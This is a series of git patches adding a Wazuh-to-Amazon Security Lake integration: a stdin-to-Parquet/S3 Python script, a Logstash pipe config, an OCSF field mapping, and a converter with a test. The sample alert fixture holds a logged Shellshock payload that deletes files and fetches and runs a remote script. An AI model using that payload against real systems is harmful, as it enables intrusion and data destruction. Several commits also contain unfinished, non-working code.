From e6784f352b56e82e945cee5643dfe49157f6f04e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:47:23 -0300 Subject: [PATCH 01/77] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake --- integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 integrations/stdin_to_securitylake.py diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py new file mode 100755 index 0000000000000..fd70e41906ccb --- /dev/null +++ b/integrations/stdin_to_securitylake.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python3 + +import os +import sys +import argparse +import logging +import time +from datetime import datetime +from pyarrow import json +import pyarrow.parquet as pq + +def encode_parquet(json_list): + for json in json_list: + ### read_json is meant for files, need to change it to read from a string + ### https://arrow.apache.org/docs/python/json.html + table = json.read_json(json) + pq.write_table(table, 'parquet/output.parquet') + +def push_to_s3(parquet): + ## Fill with AWS S3 code + pass + +def read_chunk(fileobject,length): + output=[] + for i in range(0,length): + line = fileobject.readline() + if line is '': + output.append(line) + break + output.append(line) + return output + +def get_elapsedtime(reference_timestamp): + current_time = datetime.now(tz='UTC') + return (current_time - reference_timestamp).total_seconds() + +if __name__ == "__main__": + + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H:%M:%S') + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + + parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') + + debugging = parser.add_argument_group('debugging') + debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') + debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.debug("Running main()") + logging.debug("Current time is " + str(clockstr) ) + + try: + logging.info('BUFFERING STDIN') + + with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + + output_buffer = [] + + starttimestamp = datetime.now(tz='UTC') + + try: + while True: + output_buffer.append(read_chunk(stdin,args.linebuffer)) + if output_buffer[len(output_buffer)-1] is '': + time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: + encode_parquet(output_buffer) + logging.debug(output_buffer) + starttimestamp = datetime.now(tz='UTC') + output_buffer = [] + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + + + logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: + logging.error("Error running script") + exit(1) From 116b22bfbe383588aa646d5c9d81e44173772b63 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:50:39 -0300 Subject: [PATCH 02/77] Adding logstash pipeline for python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} From 288c40a6507b8372e828a68859d1f3e94cc1d271 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 03/77] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code @@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From 6ac3c999f9ff79bbdd48228e9527d158e20d45ca Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 04/77] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 4ad01c2bd9eba6f9c99ba03b8b65f31dbae7ae62 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 05/77] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output @@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1638b171fb34089f9f657f4848228cf8786b34e9 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 06/77] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): @@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From 17e5dfb2d1026e86edba18a39e69ad69045b5157 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 07/77] Add s3 handling reference links --- integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,16 +7,19 @@ import time import json from datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 0b5adc943fa030eff6c5a45bbce2cf168dcbffea Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 08/77] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] @@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') @@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From 10824ed171977bee3ad97c4fa6b11bf4e2027b60 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 09/77] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json @@ -0,0 +1,42 @@ +{ + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "state_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.type" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } +} diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 2b8a1de14755b..d125a2ff6d56b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) @@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From c81239b48a50880809002469f36dd94a49f72300 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 10/77] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 210541d07434bb5db9d5ce3ed8cc1d5ab612d4f0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 11/77] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From 5e3c0fae21e1b58ec65571b30dba231d8ab828b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 12/77] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json @@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From 0995134abe83564e37d38ed65817cdb661e4f045 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 13/77] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 